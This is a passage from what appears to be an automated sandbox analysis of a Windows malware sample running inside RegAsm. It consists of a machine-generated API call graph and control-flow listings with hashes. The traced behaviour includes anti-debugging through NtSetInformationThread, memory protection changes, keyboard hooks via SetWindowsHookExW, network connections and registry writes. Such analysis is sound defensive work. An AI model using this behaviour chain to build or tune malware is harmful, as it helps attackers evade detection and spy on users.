calls 11965->11967 11968 f09eee 25 API calls 11966->11968 11967->11966 11969 f03e15 11968->11969 11971 f09eee 25 API calls 11969->11971 11970->11965 11973 f09eee 25 API calls 11970->11973 11972 f03e2d 11971->11972 11975 f09eee 25 API calls 11972->11975 11974 f03723 11973->11974 11974->11965 11977 f09eee 25 API calls 11974->11977 11976 f03e44 11975->11976 11976->11913 11978 f03761 11977->11978 11978->11965 11979 f09eee 25 API calls 11978->11979 11980 f037c7 11979->11980 11980->11965 11981 f09eee 25 API calls 11980->11981 11982 f03952 11981->11982 11982->11965 11983 f09eee 25 API calls 11982->11983 11984 f03d94 11983->11984 11984->11965 11985 f03d9b 11984->11985 11986 f09eee 25 API calls 11985->11986 11987 f03db6 11986->11987 11988 f09eee 25 API calls 11987->11988 11989 f03dce 11988->11989 11989->11913 11991 f06913 11990->11991 12168 f0186b 11991->12168 11993 f06918 11993->11909 11995 f068d3 11994->11995 12177 f017ce RegCreateKeyExA 11995->12177 11997 f068d8 11998 f06918 11997->11998 12187 f01d5a 11997->12187 11998->11909 12001 f0186b GetLongPathNameW 12001->11998 12003 f09eee 24 API calls 12002->12003 12004 f01740 12003->12004 12005 f09eee 24 API calls 12004->12005 12006 f0175f 12005->12006 12007 f01775 12006->12007 12015 f0062c 12006->12015 12008 f09eee 24 API calls 12007->12008 12009 f017a7 12008->12009 12010 f09eee 24 API calls 12009->12010 12049 f01100 12010->12049 12011 f081cf LoadLibraryA GetPEB 12011->12015 12012 f09eee 24 API calls 12013 f04107 12012->12013 12013->11909 12014 f0949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 12014->12015 12015->12011 12015->12014 12016 f04c36 2 API calls 12015->12016 12017 f081cf 2 API calls 12015->12017 12020 f03189 12015->12020 12021 f04109 GetPEB 12015->12021 12029 f09eee 24 API calls 12015->12029 12040 f08a84 12015->12040 12041 f07ce8 GetPEB 12015->12041 12043 f010ea 12015->12043 12046 f011bf 12015->12046 12047 f01864 GetLongPathNameW 12015->12047 12056 f017bf 24 API calls 12015->12056 12059 f01719 24 API calls 12015->12059 12060 f01dbc 24 API calls 12015->12060 12016->12015 12018 f00aae NtSetInformationThread 12017->12018 12019 f081cf 2 API calls 12018->12019 12019->12015 12022 f09eee 24 API calls 12020->12022 12024 f0452b 12020->12024 12021->12015 12023 f03601 12022->12023 12025 f03df6 12023->12025 12033 f09eee 24 API calls 12023->12033 12024->11909 12026 f03e07 12025->12026 12027 f09eee 24 API calls 12025->12027 12028 f09eee 24 API calls 12026->12028 12027->12026 12030 f03e15 12028->12030 12029->12015 12031 f09eee 24 API calls 12030->12031 12032 f03e2d 12031->12032 12035 f09eee 24 API calls 12032->12035 12034 f03723 12033->12034 12034->12025 12037 f09eee 24 API calls 12034->12037 12036 f03e44 12035->12036 12036->11909 12038 f03761 12037->12038 12038->12025 12039 f09eee 24 API calls 12038->12039 12057 f037c7 12039->12057 12042 f08799 GetPEB 12040->12042 12041->12015 12044 f08aa5 12042->12044 12045 f03189 24 API calls 12043->12045 12043->12049 12044->11909 12045->12043 12048 f011de 12046->12048 12050 f011d1 12046->12050 12053 f01864 GetLongPathNameW 12046->12053 12047->12015 12048->12049 12051 f05a43 12048->12051 12049->11909 12049->12012 12050->12048 12054 f01d3f 24 API calls 12050->12054 12052 f011f0 24 API calls 12051->12052 12055 f05a48 12052->12055 12053->12050 12054->12048 12058 f052b9 24 API calls 12055->12058 12062 f05a58 12055->12062 12056->12015 12057->12025 12061 f09eee 24 API calls 12057->12061 12058->12062 12059->12015 12060->12015 12063 f03952 12061->12063 12063->12025 12064 f09eee 24 API calls 12063->12064 12065 f03d94 12064->12065 12065->12025 12066 f03d9b 12065->12066 12067 f09eee 24 API calls 12066->12067 12068 f03db6 12067->12068 12069 f09eee 24 API calls 12068->12069 12070 f03dce 12069->12070 12070->11909 12072 f09eee 24 API calls 12071->12072 12073 f01de5 12072->12073 12074 f01e61 12073->12074 12075 f01dea WriteFile 12073->12075 12074->11909 12075->12074 12076 f01e1f 12075->12076 12077 f09eee 24 API calls 12076->12077 12078 f01e2b 12077->12078 12079 f01e59 12078->12079 12080 f09eee 24 API calls 12078->12080 12079->11909 12080->12079 12082 f01d53 12081->12082 12083 f01d5a 25 API calls 12082->12083 12084 f0690f 12083->12084 12085 f0186b GetLongPathNameW 12084->12085 12086 f06918 12085->12086 12086->11918 12090 f01217 12087->12090 12118 f0062c 12090->12118 12129 f01100 12090->12129 12192 f093ed 12090->12192 12203 f01e6c 12090->12203 12219 f016be 12090->12219 12092 f09eee 24 API calls 12094 f04107 12092->12094 12093 f04c36 2 API calls 12093->12118 12094->11925 12095 f081cf 2 API calls 12096 f00aae NtSetInformationThread 12095->12096 12097 f081cf 2 API calls 12096->12097 12097->12118 12098 f03189 12100 f09eee 24 API calls 12098->12100 12101 f0452b 12098->12101 12099 f04109 GetPEB 12099->12118 12108 f03601 12100->12108 12101->11925 12102 f03df6 12103 f03e07 12102->12103 12104 f09eee 24 API calls 12102->12104 12105 f09eee 24 API calls 12103->12105 12104->12103 12107 f03e15 12105->12107 12106 f09eee 24 API calls 12106->12118 12109 f09eee 24 API calls 12107->12109 12108->12102 12112 f09eee 24 API calls 12108->12112 12110 f03e2d 12109->12110 12114 f09eee 24 API calls 12110->12114 12111 f081cf LoadLibraryA GetPEB 12111->12118 12113 f03723 12112->12113 12113->12102 12116 f09eee 24 API calls 12113->12116 12115 f03e44 12114->12115 12115->11925 12117 f03761 12116->12117 12117->12102 12119 f09eee 24 API calls 12117->12119 12118->12093 12118->12095 12118->12098 12118->12099 12118->12106 12118->12111 12120 f08a84 12118->12120 12121 f07ce8 GetPEB 12118->12121 12123 f010ea 12118->12123 12126 f011bf 12118->12126 12127 f01864 GetLongPathNameW 12118->12127 12136 f017bf 24 API calls 12118->12136 12139 f0949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 12118->12139 12140 f01719 24 API calls 12118->12140 12141 f01dbc 24 API calls 12118->12141 12137 f037c7 12119->12137 12122 f08799 GetPEB 12120->12122 12121->12118 12124 f08aa5 12122->12124 12125 f03189 24 API calls 12123->12125 12123->12129 12124->11925 12125->12123 12128 f011de 12126->12128 12130 f011d1 12126->12130 12133 f01864 GetLongPathNameW 12126->12133 12127->12118 12128->12129 12131 f05a43 12128->12131 12129->12092 12130->12128 12134 f01d3f 24 API calls 12130->12134 12132 f011f0 24 API calls 12131->12132 12135 f05a48 12132->12135 12133->12130 12134->12128 12138 f052b9 24 API calls 12135->12138 12143 f05a58 12135->12143 12136->12118 12137->12102 12142 f09eee 24 API calls 12137->12142 12138->12143 12139->12118 12140->12118 12141->12118 12144 f03952 12142->12144 12144->12102 12145 f09eee 24 API calls 12144->12145 12146 f03d94 12145->12146 12146->12102 12147 f03d9b 12146->12147 12148 f09eee 24 API calls 12147->12148 12149 f03db6 12148->12149 12150 f09eee 24 API calls 12149->12150 12151 f03dce 12150->12151 12151->11925 12153 f052d9 12152->12153 12154 f057fa 12152->12154 12155 f09eee 23 API calls 12153->12155 12156 f09eee 23 API calls 12154->12156 12157 f05306 12155->12157 12158 f0580a 12156->12158 12157->12154 12159 f05310 InternetOpenUrlA 12157->12159 12158->11934 12159->12154 12161 f0533c 12159->12161 12160 f09eee 23 API calls 12160->12161 12161->12154 12161->12160 12162 f057b6 12161->12162 12163 f09eee 23 API calls 12162->12163 12164 f057ce 12163->12164 12165 f09eee 23 API calls 12164->12165 12166 f057e1 12165->12166 12166->11934 12167->11960 12169 f0694e 12168->12169 12172 f0187b 12169->12172 12171 f06953 12171->11993 12173 f01898 12172->12173 12176 f07c33 GetLongPathNameW 12173->12176 12175 f018b8 12175->12171 12176->12175 12178 f01818 12177->12178 12191 f01820 RegSetValueExA 12178->12191 12180 f068c2 12181 f017ce 24 API calls 12180->12181 12182 f06918 12180->12182 12183 f068d8 12181->12183 12182->11997 12183->12182 12184 f01d5a 24 API calls 12183->12184 12185 f0690f 12184->12185 12186 f0186b GetLongPathNameW 12185->12186 12186->12182 12188 f01d68 12187->12188 12189 f01dbc 25 API calls 12188->12189 12190 f01db9 12189->12190 12190->12001 12191->12180 12193 f081cf 12192->12193 12200 f09402 12192->12200 12194 f0822b LoadLibraryA 12193->12194 12195 f08799 GetPEB 12193->12195 12196 f08235 12194->12196 12197 f081ed 12195->12197 12196->12090 12198 f08219 12197->12198 12199 f08799 GetPEB 12197->12199 12198->12194 12201 f08204 12199->12201 12200->12090 12201->12198 12202 f08799 GetPEB 12201->12202 12202->12198 12204 f081cf 2 API calls 12203->12204 12205 f01e7e 12204->12205 12206 f09eee 24 API calls 12205->12206 12216 f023c9 12205->12216 12206->12205 12208 f02967 GetPEB 12211 f0298e 12208->12211 12209 f02a5f 12210 f02a71 12209->12210 12286 f02f84 12209->12286 12213 f0a810 12210->12213 12214 f02a91 24 API calls 12210->12214 12211->12209 12215 f09eee 24 API calls 12211->12215 12217 f02a2c 12211->12217 12214->12213 12215->12211 12281 f0302c 12216->12281 12218 f09eee 24 API calls 12217->12218 12218->12209 12221 f0062c 12219->12221 12220 f01706 12220->12090 12221->12090 12221->12220 12222 f04c36 2 API calls 12221->12222 12223 f081cf 2 API calls 12221->12223 12226 f03189 12221->12226 12227 f04109 GetPEB 12221->12227 12233 f081cf LoadLibraryA GetPEB 12221->12233 12235 f09eee 24 API calls 12221->12235 12247 f08a84 12221->12247 12248 f07ce8 GetPEB 12221->12248 12252 f011bf 12221->12252 12253 f01864 GetLongPathNameW 12221->12253 12254 f010ea 12221->12254 12264 f017bf 24 API calls 12221->12264 12268 f0949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 12221->12268 12269 f01719 24 API calls 12221->12269 12270 f01dbc 24 API calls 12221->12270 12222->12221 12224 f00aae NtSetInformationThread 12223->12224 12225 f081cf 2 API calls 12224->12225 12225->12221 12228 f09eee 24 API calls 12226->12228 12229 f0452b 12226->12229 12227->12221 12237 f03601 12228->12237 12229->12090 12230 f03df6 12231 f03e07 12230->12231 12232 f09eee 24 API calls 12230->12232 12234 f09eee 24 API calls 12231->12234 12232->12231 12233->12221 12236 f03e15 12234->12236 12235->12221 12238 f09eee 24 API calls 12236->12238 12237->12230 12240 f09eee 24 API calls 12237->12240 12239 f03e2d 12238->12239 12242 f09eee 24 API calls 12239->12242 12241 f03723 12240->12241 12241->12230 12244 f09eee 24 API calls 12241->12244 12243 f03e44 12242->12243 12243->12090 12245 f03761 12244->12245 12245->12230 12246 f09eee 24 API calls 12245->12246 12267 f037c7 12246->12267 12249 f08799 GetPEB 12247->12249 12248->12221 12250 f08aa5 12249->12250 12250->12090 12251 f03189 24 API calls 12251->12254 12255 f011de 12252->12255 12257 f011d1 12252->12257 12260 f01864 GetLongPathNameW 12252->12260 12253->12221 12254->12251 12256 f01100 12254->12256 12255->12256 12258 f05a43 12255->12258 12263 f09eee 24 API calls 12256->12263 12257->12255 12261 f01d3f 24 API calls 12257->12261 12259 f011f0 24 API calls 12258->12259 12262 f05a48 12259->12262 12260->12257 12261->12255 12266 f052b9 24 API calls 12262->12266 12272 f05a58 12262->12272 12265 f04107 12263->12265 12264->12221 12265->12090 12266->12272 12267->12230 12271 f09eee 24 API calls 12267->12271 12268->12221 12269->12221 12270->12221 12273 f03952 12271->12273 12273->12230 12274 f09eee 24 API calls 12273->12274 12275 f03d94 12274->12275 12275->12230 12276 f03d9b 12275->12276 12277 f09eee 24 API calls 12276->12277 12278 f03db6 12277->12278 12279 f09eee 24 API calls 12278->12279 12280 f03dce 12279->12280 12280->12090 12282 f0060e 12281->12282 12283 f030a5 12281->12283 12282->12283 12290 f005e5 EnumWindows 12282->12290 12283->12208 12285 f00613 12285->12208 12287 f02f89 12286->12287 12375 f02f8e 12287->12375 12289 f04cf9 12289->12210 12291 f005ff 12290->12291 12320 f0062c 12290->12320 12292 f005e5 23 API calls 12291->12292 12293 f00613 12292->12293 12293->12285 12295 f04c36 2 API calls 12295->12320 12296 f081cf 2 API calls 12297 f00aae NtSetInformationThread 12296->12297 12298 f081cf 2 API calls 12297->12298 12298->12320 12299 f03189 12301 f09eee 23 API calls 12299->12301 12302 f0452b 12299->12302 12300 f04109 GetPEB 12300->12320 12308 f03601 12301->12308 12302->12285 12303 f03df6 12304 f03e07 12303->12304 12305 f09eee 23 API calls 12303->12305 12306 f09eee 23 API calls 12304->12306 12305->12304 12307 f03e15 12306->12307 12309 f09eee 23 API calls 12307->12309 12308->12303 12311 f09eee 23 API calls 12308->12311 12310 f03e2d 12309->12310 12313 f09eee 23 API calls 12310->12313 12312 f03723 12311->12312 12312->12303 12315 f09eee 23 API calls 12312->12315 12314 f03e44 12313->12314 12314->12285 12316 f03761 12315->12316 12316->12303 12318 f09eee 23 API calls 12316->12318 12317 f081cf LoadLibraryA GetPEB 12317->12320 12340 f037c7 12318->12340 12319 f09eee 23 API calls 12319->12320 12320->12295 12320->12296 12320->12299 12320->12300 12320->12317 12320->12319 12321 f08a84 12320->12321 12322 f07ce8 GetPEB 12320->12322 12324 f010ea 12320->12324 12327 f011bf 12320->12327 12328 f01864 GetLongPathNameW 12320->12328 12338 f017bf 23 API calls 12320->12338 12344 f0114f 12320->12344 12356 f0949d 12320->12356 12323 f08799 GetPEB 12321->12323 12322->12320 12325 f08aa5 12323->12325 12326 f03189 23 API calls 12324->12326 12330 f01100 12324->12330 12325->12285 12326->12324 12329 f011de 12327->12329 12331 f011d1 12327->12331 12334 f01864 GetLongPathNameW 12327->12334 12328->12320 12329->12330 12332 f05a43 12329->12332 12337 f09eee 23 API calls 12330->12337 12331->12329 12335 f01d3f 23 API calls 12331->12335 12333 f011f0 23 API calls 12332->12333 12336 f05a48 12333->12336 12334->12331 12335->12329 12341 f052b9 23 API calls 12336->12341 12347 f05a58 12336->12347 12339 f04107 12337->12339 12338->12320 12339->12285 12340->12303 12346 f09eee 23 API calls 12340->12346 12341->12347 12342 f0949d 4 API calls 12342->12344 12343 f01719 23 API calls 12343->12344 12344->12320 12344->12342 12344->12343 12345 f01dbc 23 API calls 12344->12345 12345->12344 12348 f03952 12346->12348 12348->12303 12349 f09eee 23 API calls 12348->12349 12350 f03d94 12349->12350 12350->12303 12351 f03d9b 12350->12351 12352 f09eee 23 API calls 12351->12352 12353 f03db6 12352->12353 12354 f09eee 23 API calls 12353->12354 12355 f03dce 12354->12355 12355->12285 12357 f081cf 2 API calls 12356->12357 12358 f094aa 12357->12358 12359 f081cf 2 API calls 12358->12359 12360 f094c3 GetPEB 12359->12360 12371 f09b4c NtProtectVirtualMemory 12360->12371 12362 f09515 12363 f09a53 12362->12363 12372 f09b4c NtProtectVirtualMemory 12362->12372 12363->12320 12366 f09ade 12363->12366 12367 f09a84 12363->12367 12365 f09b44 12365->12320 12374 f09b4c NtProtectVirtualMemory 12366->12374 12373 f09b4c NtProtectVirtualMemory 12367->12373 12369 f09adb 12369->12320 12371->12362 12372->12363 12373->12369 12374->12365 12376 f02f9b 12375->12376 12378 f02f89 12376->12378 12379 f0060e 12376->12379 12377 f02f8e 25 API calls 12382 f04cf9 12377->12382 12378->12289 12378->12377 12380 f005e5 25 API calls 12379->12380 12381 f00613 12380->12381 12381->12289 12382->12289 12383 204f286a 12384 204f28ba FormatMessageW 12383->12384 12385 204f28c2 12384->12385 12386 204f22ea 12387 204f231f WSAConnect 12386->12387 12389 204f233e 12387->12389 12494 204f112a 12495 204f1162 ConvertStringSecurityDescriptorToSecurityDescriptorW 12494->12495 12497 204f11a3 12495->12497 12498 1db1a2d6 12499 1db1a302 SetErrorMode 12498->12499 12500 1db1a32b 12498->12500 12501 1db1a317 12499->12501 12500->12499 12502 1db1b856 12504 1db1b891 LoadLibraryA 12502->12504 12505 1db1b8ce 12504->12505 12390 204f0cfe 12393 204f0d36 WSASocketW 12390->12393 12392 204f0d72 12393->12392 12510 204f1dbe 12511 204f1df9 getaddrinfo 12510->12511 12513 204f1e6b 12511->12513 12514 204f04be 12516 204f04f6 CreateMutexW 12514->12516 12517 204f0539 12516->12517 12518 204f1932 12520 204f1967 GetTokenInformation 12518->12520 12521 204f19a4 12520->12521 12522 f0a30d 12525 f0a70f 12522->12525 12557 f0062c 12522->12557 12523 f0949d 4 API calls 12523->12557 12524 f04c36 2 API calls 12524->12557 12530 f0a7b1 12525->12530 12532 f0a7f4 12525->12532 12525->12557 12526 f081cf 2 API calls 12527 f00aae NtSetInformationThread 12526->12527 12528 f081cf 2 API calls 12527->12528 12528->12557 12529 f0a7d8 CreateFileW 12529->12530 12530->12529 12530->12530 12530->12532 12531 f03189 12534 f09eee 25 API calls 12531->12534 12535 f0452b 12531->12535 12532->12532 12533 f04109 GetPEB 12533->12557 12541 f03601 12534->12541 12536 f03df6 12537 f03e07 12536->12537 12538 f09eee 25 API calls 12536->12538 12539 f09eee 25 API calls 12537->12539 12538->12537 12540 f03e15 12539->12540 12542 f09eee 25 API calls 12540->12542 12541->12536 12544 f09eee 25 API calls 12541->12544 12543 f03e2d 12542->12543 12546 f09eee 25 API calls 12543->12546 12545 f03723 12544->12545 12545->12536 12548 f09eee 25 API calls 12545->12548 12547 f03e44 12546->12547 12549 f03761 12548->12549 12549->12536 12551 f09eee 25 API calls 12549->12551 12550 f081cf LoadLibraryA GetPEB 12550->12557 12554 f037c7 12551->12554 12552 f09eee 25 API calls 12552->12557 12553 f08a84 12556 f08799 GetPEB 12553->12556 12554->12536 12579 f09eee 25 API calls 12554->12579 12555 f07ce8 GetPEB 12555->12557 12559 f08aa5 12556->12559 12557->12523 12557->12524 12557->12526 12557->12531 12557->12533 12557->12550 12557->12552 12557->12553 12557->12555 12558 f010ea 12557->12558 12561 f011bf 12557->12561 12562 f01864 GetLongPathNameW 12557->12562 12572 f017bf 25 API calls 12557->12572 12577 f0114f 12557->12577 12560 f03189 25 API calls 12558->12560 12564 f01100 12558->12564 12560->12558 12563 f011de 12561->12563 12567 f01864 GetLongPathNameW 12561->12567 12571 f011d1 12561->12571 12562->12557 12563->12564 12565 f05a43 12563->12565 12570 f09eee 25 API calls 12564->12570 12566 f011f0 25 API calls 12565->12566 12569 f05a48 12566->12569 12567->12571 12568 f01d3f 25 API calls 12568->12563 12574 f052b9 25 API calls 12569->12574 12580 f05a58 12569->12580 12573 f04107 12570->12573 12571->12563 12571->12568 12572->12557 12574->12580 12575 f0949d 4 API calls 12575->12577 12576 f01719 25 API calls 12576->12577 12577->12557 12577->12575 12577->12576 12578 f01dbc 25 API calls 12577->12578 12578->12577 12581 f03952 12579->12581 12581->12536 12582 f09eee 25 API calls 12581->12582 12583 f03d94 12582->12583 12583->12536 12584 f03d9b 12583->12584 12585 f09eee 25 API calls 12584->12585 12586 f03db6 12585->12586 12587 f09eee 25 API calls 12586->12587 12588 f03dce 12587->12588 12397 1fee0150 12398 1fee0188 12397->12398 12400 1fee0326 12398->12400 12403 1fee1648 12398->12403 12399 1fee0468 12400->12399 12408 1fee1850 12400->12408 12404 1fee1685 12403->12404 12405 1fee1724 12404->12405 12413 1db1bed6 12404->12413 12417 1db1bf1a 12404->12417 12405->12400 12409 1fee1856 12408->12409 12410 1fee1bbe 12409->12410 12421 1fee1ccf 12409->12421 12426 1fee1cd8 12409->12426 12410->12399 12415 1db1bee3 DeleteFileW 12413->12415 12416 1db1bf5c 12415->12416 12416->12405 12418 1db1bf40 DeleteFileW 12417->12418 12420 1db1bf5c 12418->12420 12420->12405 12422 1fee1cd8 12421->12422 12423 1fee1d36 12422->12423 12431 204f05ee 12422->12431 12434 204f0588 12422->12434 12423->12409 12427 1fee1d00 12426->12427 12428 1fee1d36 12426->12428 12427->12428 12429 204f05ee SetWindowsHookExW 12427->12429 12430 204f0588 SetWindowsHookExW 12427->12430 12428->12409 12429->12428 12430->12428 12432 204f063e SetWindowsHookExW 12431->12432 12433 204f064c 12432->12433 12433->12423 12435 204f05ee SetWindowsHookExW 12434->12435 12437 204f064c 12435->12437 12437->12423 12438 1db1ae8e 12441 1db1aeb7 SetFileAttributesW 12438->12441 12440 1db1aed3 12441->12440

                                  Executed Functions

                                  Function 00F005E5, Relevance: 11.5, APIs: 2, Strings: 4, Instructions: 958nativethreadUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 f005e5-f005fd EnumWindows 1 f0062c-f00ae6 call f081cf * 2 call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 0->1 2 f005ff-f0060e call f005e5 0->2 23 f00aeb-f00b00 1->23 10 f00613-f00626 2->10 24 f00b06-f00b23 call f08314 23->24 25 f03189-f031e1 call f03e58 23->25 28 f00b28-f00b2c 24->28 31 f031e6-f035ed 25->31 32 f031e1 call f03e58 25->32 28->23 30 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 28->30 63 f01078-f010d8 call f081cf * 2 call f09eee 30->63 64 f00b8b-f00bf3 call f081cf call f09eee 30->64 36 f035f3-f03620 call f09eee 31->36 37 f0452b-f04534 31->37 32->31 48 f03df6-f03dff 36->48 49 f03626-f03726 call f03fdf call f07d70 call f09eee 36->49 40 f04535-f0454c 37->40 40->40 43 f0454e-f045a2 40->43 50 f03e07-f03e51 call f09eee * 3 48->50 51 f03e02 call f09eee 48->51 49->48 76 f0372c-f03767 call f09eee 49->76 51->50 96 f08a84-f08f11 call f08799 call f08ab5 63->96 97 f010de-f010e8 call f07ce8 63->97 64->63 81 f00bf9-f00c05 64->81 76->48 85 f0376d-f037cc call f09eee 76->85 84 f00c0b-f00c2a call f082c4 81->84 93 f00c51-f00c56 84->93 94 f00c2c-f00c35 84->94 85->48 95 f037d2-f037d7 85->95 93->96 102 f00c5c-f01053 93->102 94->96 99 f00c3b-f00c40 94->99 95->48 100 f037dd-f03825 call f037f9 95->100 108 f010ea 97->108 109 f0110b-f01111 97->109 99->96 105 f00c46-f00c4b 99->105 119 f03834-f03840 100->119 120 f03827-f0382c 100->120 102->96 110 f01059-f0105e 102->110 105->93 105->96 114 f010f4-f010fe call f03189 108->114 116 f01117-f01143 call f01864 call f07d70 call f017bf 109->116 117 f011af-f011b9 109->117 110->96 115 f01064-f01069 110->115 133 f01100-f01104 114->133 115->96 122 f0106f-f01072 115->122 116->1 159 f01149-f0114d 116->159 117->1 123 f011bf-f011c4 117->123 119->48 131 f03841-f0388e call f08314 119->131 120->48 130 f03832 120->130 122->63 122->84 127 f011c6-f011ca 123->127 128 f011de-f011eb 123->128 134 f011d9 call f01d3f 127->134 135 f011cc-f011d7 call f01864 127->135 137 f05a43-f05a52 call f011f0 128->137 138 f040a3-f04108 call f09eee 128->138 130->119 131->48 147 f03894-f03919 call f0452b call f038d6 131->147 133->138 134->128 135->128 135->134 150 f05a56 137->150 151 f05abf-f05ac6 call f052b9 137->151 147->48 180 f0391f-f03957 call f09eee 147->180 155 f05a58-f05a7f 150->155 156 f05abd-f05abe 150->156 168 f05b31-f05f1a 151->168 169 f05ac8-f05ae3 151->169 165 f05a82-f05aac 155->165 166 f05ae7-f05aee 155->166 156->151 159->117 163 f0114f-f011ae call f0949d call f01719 call f01dbc 159->163 163->117 173 f05ae4 165->173 181 f05aae-f05ac6 call f05200 165->181 174 f05af0-f05b1e 166->174 175 f05b1f-f05b2c 166->175 169->173 173->166 174->175 175->168 180->48 189 f0395d-f03d99 call f09eee 180->189 181->168 181->169 189->48 193 f03d9b-f03dd3 call f09eee * 2 189->193
                                  APIs
                                  • EnumWindows.USER32(00F00613,?,00000000,00F0643A,00F05F92,?,00F031E6,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 00F005F4
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$249E$249E$shell32
                                  • API String ID: 1954852945-4191954164
                                  • Opcode ID: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction ID: 63585eaced13dddedab5cf431a785117f0380d6aeaeed29a62a87e52cae622cf
                                  • Opcode Fuzzy Hash: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction Fuzzy Hash: F152F393E1E9143BD6A05D29FCE239BA2E65751310BB4D2099E519F78FE7ACF80253C0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F016BE, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 558UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 262 f016be 263 f016bf-f016d7 262->263 264 f016f0-f01700 263->264 265 f016d9-f016e3 263->265 267 f01706-f0170d 264->267 268 f0062c-f00ae6 call f081cf * 2 call f045aa call f0949d call f04c36 call f081cf NtSetInformationThread call f081cf 264->268 265->263 266 f016e5-f016eb 265->266 266->264 285 f00aeb-f00b00 268->285 286 f00b06-f00b2c call f08314 285->286 287 f03189-f031e1 call f03e58 285->287 286->285 292 f00b2e-f00b85 call f05811 call f04109 call f0519a call f081cf call f09eee 286->292 293 f031e6-f035ed 287->293 294 f031e1 call f03e58 287->294 325 f01078-f010d8 call f081cf * 2 call f09eee 292->325 326 f00b8b-f00bf3 call f081cf call f09eee 292->326 298 f035f3-f03620 call f09eee 293->298 299 f0452b-f04534 293->299 294->293 310 f03df6-f03dff 298->310 311 f03626-f03726 call f03fdf call f07d70 call f09eee 298->311 302 f04535-f0454c 299->302 302->302 305 f0454e-f045a2 302->305 312 f03e07-f03e51 call f09eee * 3 310->312 313 f03e02 call f09eee 310->313 311->310 338 f0372c-f03767 call f09eee 311->338 313->312 358 f08a84-f08f11 call f08799 call f08ab5 325->358 359 f010de-f010e8 call f07ce8 325->359 326->325 343 f00bf9-f00c05 326->343 338->310 347 f0376d-f037cc call f09eee 338->347 346 f00c0b-f00c2a call f082c4 343->346 355 f00c51-f00c56 346->355 356 f00c2c-f00c35 346->356 347->310 357 f037d2-f037d7 347->357 355->358 364 f00c5c-f01053 355->364 356->358 361 f00c3b-f00c40 356->361 357->310 362 f037dd-f03825 call f037f9 357->362 370 f010ea 359->370 371 f0110b-f01111 359->371 361->358 367 f00c46-f00c4b 361->367 381 f03834-f03840 362->381 382 f03827-f0382c 362->382 364->358 372 f01059-f0105e 364->372 367->355 367->358 376 f010f4-f010fe call f03189 370->376 378 f01117-f01143 call f01864 call f07d70 call f017bf 371->378 379 f011af-f011b9 371->379 372->358 377 f01064-f01069 372->377 395 f01100-f01104 376->395 377->358 384 f0106f-f01072 377->384 378->268 421 f01149-f0114d 378->421 379->268 385 f011bf-f011c4 379->385 381->310 393 f03841-f0388e call f08314 381->393 382->310 392 f03832 382->392 384->325 384->346 389 f011c6-f011ca 385->389 390 f011de-f011eb 385->390 396 f011d9 call f01d3f 389->396 397 f011cc-f011d7 call f01864 389->397 399 f05a43-f05a52 call f011f0 390->399 400 f040a3-f04108 call f09eee 390->400 392->381 393->310 409 f03894-f03919 call f0452b call f038d6 393->409 395->400 396->390 397->390 397->396 412 f05a56 399->412 413 f05abf-f05ac6 call f052b9 399->413 409->310 442 f0391f-f03957 call f09eee 409->442 417 f05a58-f05a7f 412->417 418 f05abd-f05abe 412->418 430 f05b31-f05f1a 413->430 431 f05ac8-f05ae3 413->431 427 f05a82-f05aac 417->427 428 f05ae7-f05aee 417->428 418->413 421->379 425 f0114f-f011ae call f0949d call f01719 call f01dbc 421->425 425->379 435 f05ae4 427->435 443 f05aae-f05ac6 call f05200 427->443 436 f05af0-f05b1e 428->436 437 f05b1f-f05b2c 428->437 431->435 435->428 436->437 437->430 442->310 451 f0395d-f03d99 call f09eee 442->451 443->430 443->431 451->310 455 f03d9b-f03dd3 call f09eee * 2 451->455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction ID: 175aa7b91d0f3a392c5fab84139d926a31f1eda7c46d742b1964759715f87559
                                  • Opcode Fuzzy Hash: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction Fuzzy Hash: BA023571B40309AFEF305E64CC96BDA3767AF46750F644128FE849B1C1CBB99889BB10
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00F00631, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 486nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
